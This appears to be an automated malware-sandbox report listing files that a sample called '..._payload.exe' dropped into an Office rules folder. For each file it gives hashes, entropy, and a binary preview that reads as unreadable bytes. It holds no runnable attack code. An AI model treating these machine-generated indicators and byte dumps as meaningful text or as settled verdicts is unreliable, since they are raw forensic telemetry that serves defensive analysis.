                                                                                                                          Preview:.<?(x|t...L.O2.......xF.@(....t...4x...N<........<..7.....'a.O..0_... .........?.%......?}..K. .........o...~..Htw.*...BV.6.d...#..I..f.VL..Q.k..~b...r/...v..3....=..*z.n....g.p..W....!.%O.h..t...Xc7*.*A'4(...@....h.B.+..2...GT....(...$.].8M....6D..D"....q`7[cFY..F....0.d...&-.+Fu......q...l.....Ho..!.=.+.ie .6W..r.....~.bg8.q.+....$... ..J.......`4A.p.@.R.....K..2.'.Cq.f4Z...L......[kd.j..l@...".v.<iB..|HI...rt........M.7.EQj.k7d.q.|f...&]......r......]!u.!.r..I..~D.X3).....]......;._.h...)r.=..D. ._yS4y.M8....y..b-.p...8H.|....&>...f.........nl...!..]...e..[m+.B.B.0.......%..j..rT..........\...Sk.\.Y..;&.kC..E.0.i.Rhg.......B...r............9.DL..E..r..jg..G.o.#.g.dN.I....h.ZzR.l.j"..1./..2..|_'.u#..G.>..fU1....]<.t.S.iw6-..Q\..Q.p...c.W.5...G2.@.A ........(q....k.........:;.W..~...p.V.$.....a..L..<..4..hcR`.n....MC.....qZ.S.).K(..O..Y...s.Q\.H..)}..j.s5A.S...U.up..........0....EP.*]4i.4...L...i~..Js.V.k..n..8.+y.d....:...$.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703650v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1694
                                                                                                                          Entropy (8bit):7.880118876789362
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:FzhJ1agt0LNkkP/rWLHOCaCaBB9CKhiKM+Ef8D:Fz1ag2LqK6q50Kh6+Ef4
                                                                                                                          MD5:923A4060B1261DAB82D051403B55EFE0
                                                                                                                          SHA1:DD5808D7E4EDC91E9FFCE8AFF7E577FDD4EFAB3E
                                                                                                                          SHA-256:2D27576424F3A25A5C0B849A9D469D2CDE9946B5E2A35CE07D7AD98047E815BD
                                                                                                                          SHA-512:74E1A6E4D43CF2911D1B543E255330DE9FC087A7AD8AAA7A0C698C3768A5C23192882D5609E5FE919ECE1BB346FFF72A575B30FDACFA0ACEF8A5D0DD1121173F
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?....6Z.38.....h.4d..}Ms..t.`Auf.#-..dk.*~.k.....B..Z....'.0.%e.......#@.&m...y..+=.[.[..IV.p.....Mb,....~'.o..n.r@.....S...y3.._.8..X.E2Ece3........8P......##1\...*/j.&.Y.vz......q.U.ujr...X..5..vS.,.O...,.o.Y.9.....)w.#....4.....Dm~...~..c^.v...<.N..X.C\t.......|/E.....T...X.55..0...*.WQ.^...q.#..M>..B.#.xe...J5Y..A(..L...).$x.K=.....V.@%..v\...6.4N.....L2h.YR...)..y.(.. q..#A$.? s.%.YDF....q......K....L5^....$3....!!..z`Z...E.&......f.0...%ln....+L.....|.3.Q`... 7..x.. .F.y......'fP..<p...qh.....x[.M.ub.S......fj.m.. ..q....r..N.....?>Cmw...........s......Y:.h<.../....^.:.O..l#..[.^r.B.3~;*1c..T.^...]:..H 0..[:...U`_...F..K9..fP.^'un....W]..4.;.;.&y.1.-H..\vg.]...E.GW..L}Y.4%..1...L......xj.a.W...l...:h.....h.....[i..d....AC.....Q..($y.V|[.#4.9..S`.FK.w....&....3g..B...`1-B."...9,n.o..xnj.)c7e.k.y. .b...SN%....X.%.>.D%....2PDo..6.{@@>..h.s..[..SJ....k@..z.##S.=..M.I.#mv.;..@.D....NJ..%...z..!6s........Y~.RU.../...e.uJ.n;.|...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703651v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1731
                                                                                                                          Entropy (8bit):7.891596867187087
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:5SNMuo7bJvBLYJ+VteRMNsYIMYFZYVRxprfpdtPw3+IRHqr5d/l+bD:0CxbJvxYkVQRKZlYFwx5fpdy385d/l8D
                                                                                                                          MD5:A1F6F0E265A5F299D1396E5218A3E835
                                                                                                                          SHA1:B034487F627965AA19EF09302CF38FB8F85C2E3C
                                                                                                                          SHA-256:85AA225EEA8ECA24062A632E2B5073E3033A93663CC498221896EC9A514078D2
                                                                                                                          SHA-512:A860DD78CBDE578691B8C39F77335F30CA8CA11B380BE11B5453B1FCE0B482C308EAE40C9D6787AEE5182AEC44DEEF25C08EA855D23BB9FE8E38D77FE8C4A42E
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?..w.:=.?HR:.....W,.p.@.Z-..,....s...3-...p.5.O..n..cN.5.)..l....R..B.Yw........P.Y;.4.U..H....C(r.......=Am6x.S""...........od...+.(........Y.............J...C....G.".C..I.m...-.*z.j.*...L+...|.d..j.W..U.4p|.%.+K..i.S.j$...)...U.....V..../...]....:{.ZD.a..$H4....yz.L....K..A........y...*..'|i..%.Y.OAE.+N..Q.=....-}=m.@d.N.D...Vu.[.7..%1....b.....*...^..E...$..p&.:Ug.H..!.f...F.%~E..W{H.ZD.G_H.c..l....N.....r.[..ed..S<K$...D..-.9A..o..h.q.JS..\...z-TC.ykQa.DD`.i.w.c....xq....u.'.....+.;~.ar*.~.;..*...Y"85...%..........+^.%..C....&P....7G....^._...M.).AD}$n.-L.....=..1fZ....7.Q"(A.b..4....S...#.OL......l..T.s.k.~...Y}2...T...@q.l?.B...@S`.R.'..Z}....8.]C2U......5...F.k.(v{...8..`....Kt...v..z.0..P..^8>.U.........)..Y.T.e........-......ak.k..e.t^Z?.......B#L&.......p.*f......s...$.8./......Y..-.w.0...A).R..4.&....rV.U=.3..N.Jn.6.....|=<..&.....p..3..0.1."%=[@...y..K.....N..p..I=2......]b....*.:..BY..Y.Tn....9'h0;.._-.^.k7mR.......[

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703700v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1712
                                                                                                                          Entropy (8bit):7.881579955687213
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:FlNBrN4tsS+OnHGSneS/99gmfuclGg8MQB8zH187cgiCqKopDcWZpeWiqmcWFI9o:nHOHGcbnXlgNSC7cgiLdchWiqkFJB9dD
                                                                                                                          MD5:6CF8DB60FF5E351942F9FCC823B96E89
                                                                                                                          SHA1:EF511A58C602E6992E1D440E5B41C1E27B9C0F96
                                                                                                                          SHA-256:0A33EDB832903B4FA148E5F90506B51EF0891A1C8C5CFC8C70D2170EE3B49D13
                                                                                                                          SHA-512:08062FF295655543B986E8CBE647FD04881B10FEF64F566F54884C26CD493C820278A93495BAFAB135432C0CF7DDA584DA7C4251FD4B9392510A6E1B25090B15
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?KnT.A;...@..]2...F....`Qy.,...&...j..H......').b.5...6...4....7l......5.#v.....t..U....).k2...P.P...W.j".s......x..J.3...........|..wID..%]d.^..c..G....z.O...Q..k..zS.j..)# ..K..1..Z.=Fh.....>.#pM<z...hr".>..l.../MK.oh[s...j.p..-........BT.-.3.7W.@.8..S..8..x?.LL.S.*.K....,(.0|j. &O....t...D..a>.Y.......I.K.4W.......Q.z,|.....y.....?.Q>..._464$..........k.{D.........@yk.:.TC.H...^.V3].-........Z.nOj...v..q...S$...;.C.fv.NF...@G.f.`1.=.....m.}!..;.."...a"#i(.........^..V.zf@6......<.?.-.0rr....'@%...9.].k....Ip]5G..&m..).'.|.....J.P.k3.Q&.y..*.hQ.N..2...aT..2w^kP.......sl.Z...]H.....G.Z0...F.4"...3}R.O%/..Ds"0G.5..?..5..D!.....D.,.@..1.W.(.....|..`Y...NV...../.I..x.R.(.F4..V.-..._".oO.6...'.......!..FO>...0V......M..*W}KX.9.....=hT.E..x.F...1...A.=.A...v.B4.e...R.U.1......]D.i.Kg...w.VP@...`.t...Y.........!..lp mC9l...2X...dy.)...?."l.F.".<+\............L.Z...B*.....=......H......G.|mi.$ER.4...g.rL.:........Qpj.s...g.q..<..c..?.5....x..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703701v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1749
                                                                                                                          Entropy (8bit):7.887557357037414
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ozQ2UTbmzLamFaZu+0k4W0OdyaYkFz75WDHgX7ESvx4poC1eZsKBEJnbdyh6DbD:L2UTiawzk4qyn40bgLd6Q3B80IXD
                                                                                                                          MD5:E8A99A632C28A463D5AE729E2879F509
                                                                                                                          SHA1:D49BC578E75F39A9061CCE8F338FADC5071FDDDB
                                                                                                                          SHA-256:E2480F49891495DD25C9F005EE2222A34DB5010C3EA29B91B5ECFD9AF3E71DB0
                                                                                                                          SHA-512:2637412974BDAA74F50A192954B40F32D1206A3B466E94F4310CB2BEA0EAD1307F8578AE63C323AB322E1224B1C49559FB3629C31204DD04FC7D1023A0C97A47
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.9.a.k.R.p(...c...N..L..O...$...B'2R.%k.X.K..C.d..*..NFC..F..u.r.....j..../..u..:......|\...&.....Z.{n..d...C..O`3.o...8..dF...6q.!...l..6.I..^.........OW..uM~.|8}{.R....<X@.f.`5..gn^s..b..Rs..H...-.~.......?.GO0.(......x....z....Z..b....0......*.......<...>..lN..?.o._n...%..+..@}.N..#.8.j..@"P.E._....C..]..34.....)..../'....$.~<..?K0....~....^....k>...[...H.-....4}......)*a.t..7.GY.o.q......Q.o....j.....^.5[!ez......t..N.@^..P.;..;...~uPp.an.....~...Qf...%.[.%...t........s..D.....T7!6.i^.>.rR.......a.ac..1...i.Q.gu..-'_."h........B3r.....9....W..A..>....P.js...!.L.kD.W......w.[0..{.R..pG......?[.....K.k...@../.........G...X..M;..@.(.....O...F..#&./=....^.m.hH...F....5.........FYUzY..[...c.. \M.R^.X{.7.1c..d.3y.snl..Z...>^.....vY6;...c...b.y...A.V...w..8u9..9.!........X.&.1rx..$..Su..w*.G,?g.L ..s..L...~.1.D/)#=.a...m.........<'..hH.O.V.O..<~............&;._....I."e..../i"-.+.H....'^.">1...m....?..Y....|.g......a.-B36.!.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703750v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1734
                                                                                                                          Entropy (8bit):7.886660572938216
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:iykoTBgVKDZNsKiPW+2Flgo0WXZa176BbTUD:BkoVgVKNNwPW+ClKOywbc
                                                                                                                          MD5:D0E3059E5A20F54BB7EF1C82D0FDEEE1
                                                                                                                          SHA1:A95F7C8D581A53545065127C262968640C499B8B
                                                                                                                          SHA-256:1356BF97FD166AE11A2068D19A091237E6AFAD7A2E0BCDF12BB85630F8943456
                                                                                                                          SHA-512:7E5F9FA50359EB3578E21ADD0392BB0A55071DEFBFDC9155B9E54E0275DCD33ACF865D3C978ED24ED9776DB76D5E45CF68C3EE4F59A9373A633FF803F1240A14
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?c..(..N..3..oc.|.....h...R.:.].g....E^.p7%........].0.K,.D%.........E.y.~se....=....i`.b...4G.'.,..U..F<..z[.....`.g.B.3S.H..}f..0.rMXX...ik.y....4.;!.If..8...O.C.X...k..>)...-nR.q...f.....h..j..e;..aZ...1Q..!.....(k.S..,dEb....8..3.A.!#<8.r...N.9`Cu.._..`..k..E.......!G..T.....P...(.jrS.*h.....<|...B.@C_.....IxBvi..E.R..;....`q..X..\.m.<......bh...R.G.P...0.A..?1]...K@....jf@...v.oIF....c]....N.".r..Z.>.A....Y.FG#.Q.8;@.......g...1..B...:..e........W..'*.0m..e...2....^f.3V.Z..l.......=.59.u.7...ah5....q...4.W...*...m}.-.1.Z..=z...........E=...i...K..!R......=.J.VN........Y'D..-F=..\...9...s.:.z.$b.L..|%..~#u./p'.$.....>.)vP;N..c...M..]Z....K...6..p..T.M0..mK2Sbq..........XL...X.bz/..P...|.....:...0L.K.....e....1.G..fg...N..BG{.}...q. .fP..P.5..y._}...D^)..(b.Y..;. ..X..6.9.tW.....^...g5..w...N#...(..@,p..I.....je.U.Ci2....Q[wpc..4#S.k(..3(....E...^t"..oK.u.(.G..B.(..Ys[..)..#7.*.n.._...w.H.|.k.0.........el....3......D.p<B..7.c.J...G

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703751v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1771
                                                                                                                          Entropy (8bit):7.889365083166283
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:6wb0ripdooUPcJMwRrF+m9Z790UYiJ4b5NioCbD:Vb7rTfMwRr0mJ2NLM
                                                                                                                          MD5:2E7064017D2E0C06EE5E9E88E5F9D47D
                                                                                                                          SHA1:E02EEA43EED60020DBB160243E24F7B5B3E6ED56
                                                                                                                          SHA-256:A80A98036990B392EEDB34786BF6F9F582B4874F5E6A55FBD94A8C9C655326BB
                                                                                                                          SHA-512:FCC1561F52E4FC101CFA2E434E49A27AF9E5E374EBB64C3B7FC3136DB42D6C86F3FE77BCE09F9D65A56CBDC28B0D50C94A339E04763D688D6BB1BBA9C1E44416
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?......(q.....tE3m...&....<O.[.....B.<.~F...j..4....9.3...d.{ik,~rz.P.T.qh.B...../Hg.Y.u....q.w.......T*..h4u....^.6{....0h..uN.r"..I..L..../.L..1.........gj...7...X|I.&.....X.J.y..}....9.Q..B..}B....g...\Un..k........B.....#...5.0.0..V...+.95V.}"..Dd.%....E/.uvC....M^...M.6...l..l..|.{.\.dW..4.A..O.....r..,.C...-yD^...1dQx...G.....'hG........s...-Y.bV.....0.sT..Q@&...^.?..s..T.2..u/.kK(.J...xS.../....#...f..r.;....4.x.\U..v..)D... u....@.%...|..{!.g.....5{Q..=..A'....C:......ja*6.C.....*{.....:..C....9(....`^....P.3.$...V.&9....R....C.W.........=..O9I.$....e.hG.x......`..E..>...._.E...L..\..B;$iZGg.:.=..F.4.(.D.+.r.0.\..Z?..w.6X....r.F.. AwL."...j.^.*....S6`tb..zMF~. %3....{......8;...Vj-..y.{......g.%.K;.B.r....R..S....M...V....'.k.5..U..x..-+.J.R...&....=.X....&l/.A.o.G....[..5>..a......(...0r=i....^.3.".E.t8..e...x..N}j..a...x...i...jg..z.b..W..F.>...#..XM.L..a..g...x_.clER.s.Z.W=.......o..La...Kv...,....1.$|f..W....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703800v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1716
                                                                                                                          Entropy (8bit):7.892979617506833
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Q6l+e3s+X+UEkDbBwZMYI1Aoif6U4rAGPuD:RsAfEkHBiaAo/rBPW
                                                                                                                          MD5:1FBC26EE3A5DE9C8ED6AAC284D9F1672
                                                                                                                          SHA1:2A6F427240A69E30643B7CAB0712EE899EA037D9
                                                                                                                          SHA-256:A51A4BB147B7024FD14D6753992A3E0F9CE7C4C9DAF1E9C009F4ABCE515DF93F
                                                                                                                          SHA-512:B84C31DC4F60DC853D581C70DF07B79CD00348365A07099C56E8FD10C30E7DFF83F2A8202779021C329A7C7619C66A876A2CA0BC2BAC68E2424D9C17D7006A8F
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?...k6..]X./]....TY.i.l.D.\X...f........M.%."....f.".Db.U.L......^o...Xe.:*W.K...J+9R\3:..O./.(.$.FR3.Hko..J.B+7+gZk.2.P.....t...1...v.....|;.=.eQ42R.d...e.v.....1#....$%?3@Z.*.....0-e..sc......2.k..xb[A..*)k...].OI\.T..Zc:x-.E[..^...<i&.k}.z...7D.C;J.}...u...gp...8$..Is..."..#..v....i....o...<o.l6...z...L...!....].e.....D.Z.l.2+...^......0...j..1^.&........e.....U-...[.{.y..[..a..T...`jZ.F.'.... S..ct..I...]U$ByH@...5yQ...=].. u..{...\*......%...FC....<.7..O.G(....5.%8.j|..4....m?v.n..+....}D..5...v...1.....................6...V....X..s..7...u>..s...+/..2....u...A..v..1Y.G...C..z..D.....>.....O....0....;.i!^..=...=..Qsv... ....59.....d..\.Ly.k....Rvd....[!..,S.!...M....t......v.._m,.....7.;....H....4.._..b.....D...:.w..+e>.4K.@.KT,O.lD..gf......[.D..a..g{....eK..>......%.^M.a..^@.....2..U.2M..`.KJ..?........z4m..........~d.....S....t..[].sE..G(......p'{.A.g.u:TO+b..a..E...<......Y......!...qp~'.$..b.b.V....g~.....G/.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703801v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1753
                                                                                                                          Entropy (8bit):7.89010887359994
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:gFUh5sg2I7RA8JKX6cNipQHF1qfIEK+tKNoyTznZD:gy9JygOHzbp+seYznR
                                                                                                                          MD5:9EB8690614DC193A6A34A7AF28BC561D
                                                                                                                          SHA1:6198D4748DF578A5B0A3E3369AF565EFC34ED1C6
                                                                                                                          SHA-256:2727DE06117A662E31AB64C8DEF7439A10B2AF3F331C572872314E165B547AE3
                                                                                                                          SHA-512:2D24AB258536467F59A26EEAF6B027242018BD0D3857762EA7389C383ED03D8CEF4D2779F17ED1DFDE78200AB9779023483A3ACD681B17C8A1E453ABAC6BDE23
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?q:....K.SEU(."..Eo.).:...d..,a...G...#{..)Wv.Q.:....3...{P4....q..^...L..S...!.".a.D>..U..n..]..@.x...[.K{...;.^...M.0..a.l{..M..^.....WU...kd..(....E_.'y:Yhsr.3..$.X.0....T....o.~5x.!...~..[..J8..f-]..J.L5.N..Y..Z.Xh.....).....Lf.f87.......?m#.u_IU......DyR}..3.B.=6#..R..d.3Dg..oG....+.(./.Y.....T..8j.]T.......'&.@.,Mf."cuf.c.Je#.!..G.wa>..5..].).......B.+....v..+.V}D...i^).[.k.#.zc.37.AwU..#...:Y.....B8V...r..0...%$..P...F3....`W...P....#..;.)/M...^q....SPVf~.E.eg.)j.(..K6.....]za....:.|L'E....5..IK...w.{...)enH........F.".rc!...Kp...Q..8.'.......)#u.._..........9..[b..s.2.........u;.K..qyM#..`.N..,..Ce.7.D.G...l@....]k.|.G....].......z....V.U.e..E..]...K&....{.r...VCA\;...K.X..x.....R..n..#.I.A.....?........3...R.....g.......,R$...............x....#..2.....R.?....;..+gw...)..PQ+._............o.6.r.dJ@Z....[U.XPG..=..n..}..X.Sax..W...6.u..#.).hlM.k)....A... HF2Y....(CWj|....6....tJ.V.Op..n...r...=...x...{`....G..A.%.t}qq.f...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703850v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1739
                                                                                                                          Entropy (8bit):7.879408085187419
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:DfCcWt0/pj5zH2aA1GTGAnBimu9XML8e0RAEz9D:DaN4pj5zH2aA+na8L8DRRzF
                                                                                                                          MD5:1E92A6B2B770C47F0DA1A21E1443AAAD
                                                                                                                          SHA1:B9976B2581A832A5117284C9E66E36C8C582A6D2
                                                                                                                          SHA-256:61CEDF8DB05D8E7309D33F5818FB8A51465EC6CCF79751891295352354EC6CF9
                                                                                                                          SHA-512:83F520EA39DBC6B39DC0690028E4358B2AD9923F0A0DE6818BA74EECEC9C77B6E68D3943D5EDC903582C96F79A78D3381FCCC724E6A15F18B7940EAF33B11C57
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?f..U.....Suy.f&7Z......70'O.:;.8.F..*.............+.....?h3_.v..``......"R..t^Z".d..c.T1..w%.}.MX.I......5..6v]7..{.......I....;K.9........Rm..n..F(..=....7!..D.T....q..`.<Q........8..>...."?b..c.1PC.>.$suz...({.u..Z........D....s..o....RQT../.7cm.H.2.Y$.9.t:?..T...8......)).&.n.!...%.h..!......a....DQ.%..0..{.....%..S...k...K.....n.v..\|.+.c....1.M..a......7.a(..k.C...A...h2..S.#F.?$......b.3.....<....+.H.g...Yv.*h$B..;q..J.M..'.8(]...^%3D..K@.H.[Uy....pr...?..$.....#...i..d..T........q~.2.......2.`W`..W.~.E....N.H.R_..u..3.q.:....z.....?.@).g........23..Ob.F..Gr...-..f.!.v.7......K...c..RU.c.H.z<...+..}|.W..<(.`O$.-Q.{TD...bKgVQ%.,/..c..#......A..MG...r.\..3.g..X3<...3...u.~.c....^M.i..!..\..n...[..6..b.5m.`..%7<.%.m...pu.f.9..:$.,%B..'..v.x.._.e......n.W...n{.[.?.8%.U.^.@.........2...$.d..Q.w .m.]...a..b...+..3.]....n.$.G.y....rz);%/...r.......A...t..^Y..a......N.rh...........3...xCD....9...n.)U6.>M..]>+.a.$Rq..........

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703851v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1776
                                                                                                                          Entropy (8bit):7.89829457799952
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:LocrDhnVe9pavFpQR+OC2mIPLpAHGI/OCOniRzWnR+xVByD:LosnVe948R+BeLvCSUzmkxa
                                                                                                                          MD5:87A9D8F1B18093AE852FCE5CFA68DD4C
                                                                                                                          SHA1:EF08BCC6AC5D4F77EF9D2FCE3F2CFA39416C5F2E
                                                                                                                          SHA-256:14E6C96A39C6FA36911CB81AB43C25FB3D8A79843DF32700C015C34032FE04F5
                                                                                                                          SHA-512:1819A593F85C21B81FC6DF3A77D9D26EE3C0BDD0A0C8C62363199EE21425D92452B24FA04E6F5062228274BB99D0DEB9F8642A59B38D641EFDFF4A1BF3FA12E6
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?z^.<..vI.1..q.%...h....Nz.._..a.^..t4+..@..D.....Sv..t.u.\...1E.h.....*L.j.?. .d.M..w~$^..q......T3...s..k9.....+.e.0..5.....S...A'.w..le.f.X':.g ..W....gb.fB.$...UtM..8./...p.`.|....r.Yt.>t....<I.>...X.%{*....x.........x.6.MCD..7...x=.S.v._/N.U..!..2Y..m.u..'.'.w..H.m...%.;...`S..f.....iQ._.._Q*8OgS..Rse>..z..).}..%!.K..&.az_y...A.....y..r..S.&.....$.T..f.F..*l^.P.`..j.(...4...\Pf.....0*=.d...7.].....z.!.52..o.q...$5...]....RhA4\../.^I...6._ .d.}.....N....2.J....PF.:....VQ.R....../..<.b..SmN.&.....{7J..v..qR.x.,&.~u.R.......).L.LC..'.1.i..TJ..ND.f%....e'y-..y..&.....}A.2...tw;....M(...0.@..2....]u.]....9.@/.'..S\.?..".....\..G...>b..[~}R.E+..F."m~......'_V.F.U..)....X..u......'.W..<f...<.@.F.YS-./......@.xp..K..O.(.Zg.y[.=;f...X..*.i..........:3.^ny....y.^X ..~H@..m<.*@S.p.3z..%.p.Y.{.]O..E.k.,..?O.a.q...e..<.Bn...([Q..q.n..G-..%...f.&...^Y.....8.....I.5..t...;l.4-..8.j...k.\..>v.V..=.8[7..D..J.&.Q...[..$Q<...^?.....f..W.P..........

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703900v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1724
                                                                                                                          Entropy (8bit):7.8832559475133746
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:YjY2WciyJ4MehGG2sFFF4whnI3sJhN6fgGjPG+I2D:rcVJ4MeT21knI8DN6fHzG7u
                                                                                                                          MD5:6408C2C631025A3803A7A69517FF4547
                                                                                                                          SHA1:5A9534511B1F9840FACED54A52499883E08BA054
                                                                                                                          SHA-256:70BCF668843EF42A2E88D57B812C5410C9E794680B55A6141CD6D7AC96C2B3D8
                                                                                                                          SHA-512:A7FEC21C993F5CF919352ADEB33544D377BBC8B11AB54E3319EE4ECE28CEC3BF8ABF48410A6EA8EF7148806DCDFC20EC9FDC2E3E3238E9E394B8AC4B71E7BBC1
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?../.....4d.J.........t@..R..`..&.j.E.K....q.(..+...............s~...z...3cJ....v.7........D).V.... ......c..._.L..u.....N8S.Z...u.(.../.....h..Q%&.R..:.......'.l2.i..RZM\m...4.....V.K..N$.....s..{.o..P..2.e....m...>....)yB....;&.4m..|.:.\F..i.K;_.C.Q..=.@.5Z.\j..F.-.`b.p..%T'.9.6..CC....<.a<0..C...=.(.........{...VC.3Z...9.G.....e.9.Q.....;|.i....../.g................e.....t]>..l...._..\....Y...qp...G...#.J\.&...V=y.'.9......+...r...-l."`.p.9A[Qk..[..X......a..L5....%....W.mJ.O....(..b..~Ty7..s.-.r....j..5..(...n.O.^M.L...........N~.J?..X.....Y..r7.1...,...F...._.:....Y|..8.......M....#..7.j.:..eQ.U.R.=.....w]......W{....i.5...SKr.f...r....b.._......;<.......+.V..Q..E+..r%E`.Y..,.KGr.".ZK....[fp......w....^...e.cy...7......C` B..-..[..&4.I...,..W.J.j.Z....K.]../.K...g...!..".....;j.b..4.nwrR.M.NE.....Y.y.(.d_.~..r.....y.<1....-(x..r3G.G....d.W(....Z".Z....=.w........|.x..^^...0.:L...fa...A'.'.kDg'..M ..........:.h5.R........2.Mv.(G..&q

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703901v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1761
                                                                                                                          Entropy (8bit):7.8819126653535365
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:ZOOPgjKmV4KlYaKa2BJLVemcM6NsRRiQbEjlwD:Z9g+3PFaQB5cZsvXAe
                                                                                                                          MD5:D7B1505EC84897CC13EA961AD6036FB3
                                                                                                                          SHA1:19CDF6AD409A8970C0698FDBDB35E4C75EF6DF16
                                                                                                                          SHA-256:68806EA3DCA4560864E9517583F429276D474C6720156ADF906C202639D4F108
                                                                                                                          SHA-512:A6E72D92020A0B3E64B22DB42B1158177FA6FBF51788B325B06134FBBE604550EE8A799130556098EDBA7E0FFB00C005B44A94FF0C7F51B52762A6646B691E47
                                                                                                                          Malicious:false
